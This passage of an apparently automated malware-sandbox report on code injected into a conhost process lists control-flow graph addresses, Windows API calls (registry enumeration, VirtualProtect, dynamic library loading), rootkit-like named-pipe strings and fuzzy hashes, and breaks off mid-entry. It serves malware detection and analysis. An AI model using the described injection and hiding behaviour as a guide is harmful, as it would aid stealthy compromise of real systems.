                                  control_flow_graph 313 1b44490a22c-1b44490a294 call 1b44490b144 316 1b44490a6f5-1b44490a6fb call 1b44490c388 313->316 317 1b44490a29a-1b44490a29d 313->317 317->316 318 1b44490a2a3-1b44490a2a9 317->318 321 1b44490a378-1b44490a38a 318->321 322 1b44490a2af-1b44490a2b3 318->322 323 1b44490a645-1b44490a649 321->323 324 1b44490a390-1b44490a394 321->324 322->321 325 1b44490a2b9-1b44490a2c4 322->325 326 1b44490a64b-1b44490a652 323->326 327 1b44490a682-1b44490a68c call 1b444909324 323->327 324->323 328 1b44490a39a-1b44490a3a5 324->328 325->321 329 1b44490a2ca-1b44490a2cf 325->329 326->316 331 1b44490a658-1b44490a67d call 1b44490a6fc 326->331 327->316 341 1b44490a68e-1b44490a6ad call 1b444908070 327->341 328->323 333 1b44490a3ab-1b44490a3af 328->333 329->321 330 1b44490a2d5-1b44490a2df call 1b444909324 329->330 330->341 344 1b44490a2e5-1b44490a310 call 1b444909324 * 2 call 1b444909a0c 330->344 331->327 334 1b44490a575-1b44490a581 333->334 335 1b44490a3b5-1b44490a3f0 call 1b444909704 333->335 334->327 342 1b44490a587-1b44490a58b 334->342 335->334 349 1b44490a3f6-1b44490a3ff 335->349 346 1b44490a59b-1b44490a5a3 342->346 347 1b44490a58d-1b44490a599 call 1b4449099cc 342->347 380 1b44490a330-1b44490a33a call 1b444909324 344->380 381 1b44490a312-1b44490a316 344->381 346->327 348 1b44490a5a9-1b44490a5b6 call 1b4449095a4 346->348 347->346 357 1b44490a5bc-1b44490a5c4 347->357 348->327 348->357 355 1b44490a403-1b44490a435 349->355 359 1b44490a568-1b44490a56f 355->359 360 1b44490a43b-1b44490a447 355->360 362 1b44490a6d8-1b44490a6f4 call 1b444909324 * 2 call 1b44490c2f4 357->362 363 1b44490a5ca-1b44490a5ce 357->363 359->334 359->355 360->359 364 1b44490a44d-1b44490a46c 360->364 362->316 366 1b44490a5d0-1b44490a5df call 1b4449099cc 363->366 367 1b44490a5e1 363->367 368 1b44490a558-1b44490a55d 364->368 369 1b44490a472-1b44490a4af call 1b4449099e0 * 2 364->369 376 1b44490a5e3-1b44490a5ed call 1b44490b1dc 366->376 367->376 368->359 394 1b44490a4e2-1b44490a4e5 369->394 376->327 391 1b44490a5f3-1b44490a643 call 1b444909634 call 1b444909838 376->391 380->321 393 1b44490a33c-1b44490a35c call 1b444909324 * 2 call 1b44490b1dc 380->393 381->380 385 1b44490a318-1b44490a323 381->385 385->380 390 1b44490a325-1b44490a32a 385->390 390->316 390->380 391->327 418 1b44490a35e-1b44490a368 call 1b44490b2cc 393->418 419 1b44490a373 393->419 399 1b44490a4e7-1b44490a4ee 394->399 400 1b44490a4b1-1b44490a4d7 call 1b4449099e0 call 1b44490a96c 394->400 403 1b44490a55f 399->403 404 1b44490a4f0-1b44490a4f4 399->404 414 1b44490a4f9-1b44490a556 call 1b44490a158 400->414 415 1b44490a4d9-1b44490a4dc 400->415 408 1b44490a564 403->408 404->369 408->359 414->408 415->394 423 1b44490a36e-1b44490a6d1 call 1b444908f84 call 1b44490ad28 call 1b444909178 418->423 424 1b44490a6d2-1b44490a6d7 call 1b44490c2f4 418->424 419->321 423->424 424->362
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction ID: 18c4848c3fe626c4d672897abd40f2bd0a56ece1c08ee5c1546d75db6a971ce5
                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                  • Instruction Fuzzy Hash: 5DD16972604B808BEB20DB7594843DD77F0F765B98F108219EE8957B9ADF34C4A1EB80
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 849930591-393685449
                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction ID: e60c2cfcce102fcaba678f3f03b004ea9b98cc401d15638874805763b243815f
                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                  • Instruction Fuzzy Hash: 5DD17C3A608B848BEF60DFA5D4803ED77A0FB55788F148516EE8967B96DFB4D0A1C700

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 434 1b44490104c-1b4449010b9 RegQueryInfoKeyW 435 1b4449011b5-1b4449011d0 434->435 436 1b4449010bf-1b4449010c9 434->436 436->435 437 1b4449010cf-1b44490111f RegEnumValueW 436->437 438 1b4449011a5-1b4449011af 437->438 439 1b444901125-1b44490112a 437->439 438->435 438->437 439->438 440 1b44490112c-1b444901135 439->440 441 1b444901147-1b44490114c 440->441 442 1b444901137 440->442 443 1b444901199-1b4449011a3 441->443 444 1b44490114e-1b444901193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->444 445 1b44490113b-1b44490113f 442->445 443->438 444->443 445->438 446 1b444901141-1b444901145 445->446 446->441 446->445
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                  • String ID: d
                                  • API String ID: 3743429067-2564639436
                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction ID: 55a88ce8310408e5ca3866b56f05178f02c5b8574d209b657552d84bb9bd5f8c
                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                  • Instruction Fuzzy Hash: 54418C33214B80DBE7A4CF31E48579A77B1F388B99F448129DA8907B59DF39C499CB40

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                  • String ID: \\.\pipe\$rbx-childproc
                                  • API String ID: 166002920-1828357524
                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction ID: 81814320b12abb28dafed95e6a46d83729cadb3973f41b76cf2907b6901ae763
                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                  • Instruction Fuzzy Hash: AF113736614B4083F750CF61F49839AB771F389BA5F948215EA9902AA9CF3CC168CB40

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 452 1b444907c50-1b444907c56 453 1b444907c58-1b444907c5b 452->453 454 1b444907c91-1b444907c9b 452->454 455 1b444907c85-1b444907cc4 call 1b4449082f0 453->455 456 1b444907c5d-1b444907c60 453->456 457 1b444907db8-1b444907dcd 454->457 472 1b444907cca-1b444907cdf call 1b444908184 455->472 473 1b444907d92 455->473 458 1b444907c78 __scrt_dllmain_crt_thread_attach 456->458 459 1b444907c62-1b444907c65 456->459 460 1b444907ddc-1b444907df6 call 1b444908184 457->460 461 1b444907dcf 457->461 467 1b444907c7d-1b444907c84 458->467 463 1b444907c67-1b444907c70 459->463 464 1b444907c71-1b444907c76 call 1b444908234 459->464 475 1b444907df8-1b444907e29 call 1b4449082ac call 1b44490814c call 1b444908634 call 1b444908450 call 1b444908474 call 1b4449082dc 460->475 476 1b444907e2b-1b444907e5c call 1b4449084b0 460->476 465 1b444907dd1-1b444907ddb 461->465 464->467 484 1b444907ce5-1b444907cf6 call 1b4449081f4 472->484 485 1b444907daa-1b444907db7 call 1b4449084b0 472->485 477 1b444907d94-1b444907da9 473->477 475->465 486 1b444907e6d-1b444907e73 476->486 487 1b444907e5e-1b444907e64 476->487 503 1b444907d47-1b444907d51 call 1b444908450 484->503 504 1b444907cf8-1b444907d1c call 1b4449085f8 call 1b44490813c call 1b444908168 call 1b44490b428 484->504 485->457 492 1b444907eb5-1b444907ecb call 1b444903a1c 486->492 493 1b444907e75-1b444907e7f 486->493 487->486 491 1b444907e66-1b444907e68 487->491 498 1b444907f52-1b444907f5f 491->498 513 1b444907ecd-1b444907ecf 492->513 514 1b444907f03-1b444907f05 492->514 499 1b444907e86-1b444907e8c 493->499 500 1b444907e81-1b444907e84 493->500 506 1b444907e8e-1b444907e94 499->506 500->506 503->473 526 1b444907d53-1b444907d5f call 1b4449084a0 503->526 504->503 554 1b444907d1e-1b444907d25 __scrt_dllmain_after_initialize_c 504->554 509 1b444907f48-1b444907f50 506->509 510 1b444907e9a-1b444907eaf call 1b444907c50 506->510 509->498 510->492 510->509 513->514 521 1b444907ed1-1b444907ef3 call 1b444903a1c call 1b444907db8 513->521 516 1b444907f07-1b444907f0a 514->516 517 1b444907f0c-1b444907f21 call 1b444907c50 514->517 516->509 516->517 517->509 535 1b444907f23-1b444907f2d 517->535 521->514 549 1b444907ef5-1b444907efa 521->549 542 1b444907d85-1b444907d90 526->542 543 1b444907d61-1b444907d6b call 1b4449083b8 526->543 540 1b444907f34-1b444907f42 535->540 541 1b444907f2f-1b444907f32 535->541 546 1b444907f44 540->546 541->546 542->477 543->542 553 1b444907d6d-1b444907d7b 543->553 546->509 549->514 553->542 554->503 555 1b444907d27-1b444907d44 call 1b44490b3f0 554->555 555->503
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: 310d56a0d9e13f9b8a9553d24df171a60345dc87557337fef716ff6189678dc3
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 4E81B131700A418BFBA0EB7694C13E973B1AB85BA4F54C165AA4987797DF38C876B700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000003.2318613329.000001B4448A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B4448A0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_3_1b4448a0000_conhost.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction ID: 18acefc8d352f54553c54cba37a9ccd64f6fd5da5e6683460892d8e5b781eb7e
                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                  • Instruction Fuzzy Hash: 3481C33D7006858BFE54AB6998423D973D1AF86B80F49C025AE09677D7DFB8C876E700

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 558 1b444909aac-1b444909aea 559 1b444909b9e 558->559 560 1b444909af0-1b444909af3 558->560 561 1b444909ba0-1b444909bbc 559->561 560->561 562 1b444909af9-1b444909afc 560->562 563 1b444909b96 562->563 564 1b444909b02-1b444909b11 562->564 563->559 565 1b444909b1e-1b444909b3d LoadLibraryExW 564->565 566 1b444909b13-1b444909b16 564->566 569 1b444909bbd-1b444909bd2 565->569 570 1b444909b3f-1b444909b48 GetLastError 565->570 567 1b444909b1c 566->567 568 1b444909bdd-1b444909bec GetProcAddress 566->568 573 1b444909b89-1b444909b90 567->573 568->563 572 1b444909bee-1b444909bf9 568->572 569->568 571 1b444909bd4-1b444909bd7 FreeLibrary 569->571 574 1b444909b77-1b444909b81 570->574 575 1b444909b4a-1b444909b5f call 1b44490c4d8 570->575 571->568 572->561 573->563 573->564 574->573 575->574 578 1b444909b61-1b444909b75 LoadLibraryExW 575->578 578->569 578->574
                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909B31
                                  • GetLastError.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909B3F
                                  • LoadLibraryExW.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909B69
                                  • FreeLibrary.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909BD7
                                  • GetProcAddress.KERNEL32(?,?,?,000001B444909C6B,?,?,?,000001B44490945C,?,?,?,?,000001B444908F65), ref: 000001B444909BE3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                  • String ID: api-ms-
                                  • API String ID: 2559590344-2084034818
                                  • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction ID: edf3e1e77bacf71dc782d8ca6cee84bf0f0f84abea8bb80c8e8fcda97f07428a
                                  • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                  • Instruction Fuzzy Hash: CD31A1313126409BFE51DB26A8807E533F4BB44BB4F5A8629EE1D47796EF38C464E310
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                  • String ID: CONOUT$
                                  • API String ID: 3230265001-3130406586
                                  • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction ID: f0fa99bd62df95ac14892b301c6a97daec3332a14353a867b2d6a779ec9b638d
                                  • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                  • Instruction Fuzzy Hash: A8116031310B4087F7A18BA2E894759B7B0F788BF5F448214EA5E87BD5CF38C4249740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Thread$Current$Context
                                  • String ID:
                                  • API String ID: 1666949209-0
                                  • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction ID: 50a3d2aba997ac5eaa9b6fb8a0ca58433b254b65fc81f496d7491e8623055f7f
                                  • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                  • Instruction Fuzzy Hash: EBD17C76204B8886DB70DB1AE49439AB7B0F7C8B98F104516EACD57BA6DF3CC561DB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Free$CurrentThread
                                  • String ID:
                                  • API String ID: 564911740-0
                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction ID: b91d5e13956fead561301f578a7fb07dcf23f08c54c07252b4ecb19dd3195544
                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                  • Instruction Fuzzy Hash: CD51E034201B4597EB49DF78E8D53D873B1BB04759F808825A96C46BA7EF78C938E340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID: $rbx-
                                  • API String ID: 756756679-3661604363
                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction ID: c4fc703256a291c02bf995bd590257b161354b7bb8c8b7b471f4f6eae97ffe4f
                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction Fuzzy Hash: 16318832701B5583EA65DF36A9817A9B3B0FB44B84F09C0209F4907B66EF38C8B1A700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: ErrorLast$Value$FreeHeap
                                  • String ID:
                                  • API String ID: 365477584-0
                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction ID: 4bf8cf0c78c64848dad9c9c1bbb7b472b41946d4785c7daaa569019cb526d1dd
                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction Fuzzy Hash: 3E118E3231124043FA58BF35A8D57EE3272AB85BA4F58C624A96A567CBCF38C421B300
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID:
                                  • API String ID: 517849248-0
                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction ID: c5eb053444e7889b53c5f5ef0d7a88c881ce811834ecf096b4f50a6322cf994c
                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction Fuzzy Hash: BD015B31700A4087FA50DF62A89839973B1F788FD1F8981349E4D43755DF38C996C740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                  • String ID:
                                  • API String ID: 449555515-0
                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction ID: 9a0670d5bb27f0a405a7799c0e5323d1cb8b44489e289d539b73573c6f5dc72b
                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction Fuzzy Hash: 07014C75211B4083FB649FB1F88879A73B0BB49B56F048428CA4D067A6EF3DC568E700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd
                                  Similarity
                                  • API ID: FinalHandleNamePathlstrlen
                                  • String ID: \\?\
                                  • API String ID: 2719912262-4282027825
                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction ID: 283f8cc3a8c87e14c21121bb79628bf3605a41bef8c4d280fd38f3bc3230c3a3
                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction Fuzzy Hash: 41F08C3230468593FB608F30E4C43997370F744B9AFC880218A494395ADF6CC6A9EB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true
                                  • Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
